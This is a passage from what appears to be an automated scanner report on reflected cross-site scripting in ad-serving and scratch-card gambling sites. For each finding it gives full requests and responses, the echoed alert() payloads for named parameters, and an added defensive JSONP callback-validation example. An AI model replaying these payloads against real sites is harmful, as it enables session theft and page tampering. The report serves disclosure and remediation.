Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7547

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/20f/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c14c"-alert(1)-"6086ad86766 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/y%3B240312816%3B0-0%3B0%3B63191625%3B4307-300/250%3B41923894/41941681/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L1c14c"-alert(1)-"6086ad86766&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b6f"-alert(1)-"f1e62c14a44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1703625&31b6f"-alert(1)-"f1e62c14a44=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:33 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:33 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?31b6f"-alert(1)-"f1e62c14a44=1&Z=728x90&s=1703625&_salt=3404908760";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

3.26. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload aba86<script>alert(1)</script>c1e227c2a98 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=282eed89-72f0-45c6-8111-20529e7e7fdf; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550335; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3PvU7DMBAH8H-TNnXtli4FxMB3JyQjp06MP
...[SNIP]...

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is echoed unmodified as the JSONP callback name. The payload 4a935<script>alert(1)</script>c320f4b1392 was submitted in the callback parameter, and the 74-byte response consists of nothing but that name followed by (2).

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the response body. As with any JSONP endpoint, the caveat is that the body is declared text/javascript: direct navigation to the URL executes nothing unless the browser sniffs the content as HTML, while the absence of any restriction on the callback name remains a defect however the response is consumed.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5384441&plc=62171182&sid=1037707&num=5&ver=2&dv_url=http%3A//ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&callback=__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392 HTTP/1.1
Host: rtb50.doubleverify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 16 May 2011 12:52:00 GMT
Connection: close
Content-Length: 74

__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392(2)
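
As an added example (not code from OpenX, DoubleVerify or the report's author), the following Node.js responder shows the check that both JSONP endpoints above lack: the callback name is matched against an allow-list of identifier characters before it is echoed, the JSON payload is escaped for script context the way the OpenX response already escapes < as \u003c, and the headers stop a browser from sniffing the body as HTML. The function and constant names are hypothetical; the two sample callback names are the ones seen in findings 3.26 and 3.27.

```javascript
// Added example, not code from OpenX, DoubleVerify or the report's author:
// a JSONP responder that allow-lists the callback name before echoing it
// (the c and callback parameters above were echoed with no such check) and
// sets headers that stop a browser treating the script body as HTML.
// Function and constant names are hypothetical.

// A callback must be a dotted JavaScript identifier path such as
// "__verify_callback_3834651037884" or "OXM.cb1". Quotes, angle brackets,
// parentheses and whitespace never match, so "<script>" can never be echoed.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isValidCallback(name) {
  return typeof name === 'string'
    && name.length > 0
    && name.length <= MAX_CALLBACK_LEN
    && CALLBACK_RE.test(name);
}

// Serialise data for embedding in script: JSON.stringify, then escape "<"
// (as the OpenX response above does with \u003c, so a "</script>" inside a
// value cannot end an inline script) and U+2028/U+2029, which are legal in
// JSON strings but terminate a line in JavaScript.
function toScriptSafeJson(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Returns {status, headers, body} instead of writing to a socket so the
// result can be inspected offline.
function jsonpResponse(callback, data) {
  const baseHeaders = {
    // nosniff keeps browsers from second-guessing the declared type.
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'no-store',
  };
  if (!isValidCallback(callback)) {
    return {
      status: 400,
      headers: { ...baseHeaders, 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'invalid callback', // the rejected name is deliberately not echoed
    };
  }
  return {
    status: 200,
    headers: { ...baseHeaders, 'Content-Type': 'application/javascript; charset=utf-8' },
    // The leading comment fixes the first bytes of the body, so a caller
    // cannot make the response start with characters of its own choosing
    // (the trick used to pass a JSONP reply off as a Flash file).
    body: `/**/${callback}(${toScriptSafeJson(data)});`,
  };
}

// Sample callback names taken from findings 3.26 and 3.27 above.
const SAMPLE_GOOD = '__verify_callback_3834651037884';
const SAMPLE_BAD = 'OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98';

// Usage: the valid name is echoed, the injected one is refused.
console.log(jsonpResponse(SAMPLE_GOOD, { r: '<div>ok</div>' }).body);
console.log(jsonpResponse(SAMPLE_BAD, {}).status);
```

isValidCallback() is the part that matters; the Content-Type and nosniff headers only close the direct-navigation route and do nothing for a page that includes the script on purpose.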

3.28. http://scratch.co.uk/ [currency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency request parameter is copied into the href attribute of an anchor, inside a javascript: URL, where it sits within a single-quoted JavaScript string passed to openScratch(); the attribute itself is delimited by double quotes. The payload f52a7"><script>alert(1)</script>f3c08612d87 was submitted in the currency parameter and echoed unmodified: the double quote ends the href value and the > closes the tag, so the <script> element that follows is parsed as markup rather than as part of the URL.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The response also stores the submitted value, URL-encoded, in the currency cookie (see the Set-Cookie header below); whether later pages decode and re-echo that cookie is not shown in this report.

Request

GET /?currency=USDf52a7"><script>alert(1)</script>f3c08612d87 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USDf52a7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef3c08612d87; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USDf52a7"><script>alert(1)</script>f3c08612d87', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.29. http://scratch.co.uk/ [currency parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency request parameter is copied into a JavaScript string literal delimited by double quotes: the clickTag value inside the flashembed() call, which is itself a javascript: URL calling openScratch(). The payload 737fc"%3balert(1)//814391c7445 (the semicolon URL-encoded so that it reaches the application intact) was submitted in the currency parameter and echoed as 737fc";alert(1)//814391c7445. The double quote terminates the string, the semicolon ends the statement, and // comments out the remainder of the line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD737fc"%3balert(1)//814391c7445 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '&pound;53,521,715',
               topprizetext: 'Scratch &pound
...[SNIP]...

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the CUR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef230'%3balert(1)//49f697934b was submitted in the CUR parameter. This input was echoed as ef230';alert(1)//49f697934b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CUR=GBPef230'%3balert(1)//49f697934b&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dxeuyd55fuapfle5trgjlp45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19499


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
UserName='-';
       var PlayMode='';
       var LastPage='-';
var Gender = '';
var Depositor = '';
var LastDepositStatus = '';
var ErrorCode='';
var Currency='GBPef230';alert(1)//49f697934b';
var Language='ENG';
       var iFrameIndex=0;

   var bRequestedClose = false; //Flag to indicate a close request to prevent double close of the window
   function ReloadPage(pLanguageCode,pCur
...[SNIP]...

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the PRD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d09da'%3balert(1)//698914ca5c0 was submitted in the PRD parameter. This input was echoed as d09da';alert(1)//698914ca5c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=d09da'%3balert(1)//698914ca5c0&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xlhekov0yyaqd345yzm2mh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
,'EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7','','','','d09da';alert(1)//698914ca5c0',"")
                        </script>
...[SNIP]...

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the UNIQUEVISITORID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac3b5'%3balert(1)//0fdbb5aef4f was submitted in the UNIQUEVISITORID parameter. This input was echoed as ac3b5';alert(1)//0fdbb5aef4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5'%3balert(1)//0fdbb5aef4f&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ar2sx145gmevit45fudsrcn4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
#2c62a0','0','EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5';alert(1)//0fdbb5aef4f','','','','',"")
                        </script>
...[SNIP]...

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the AR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8abcd'%3balert(1)//fdbdc8c0c01 was submitted in the AR parameter. This input was echoed as 8abcd';alert(1)//fdbdc8c0c01 in the application's response.

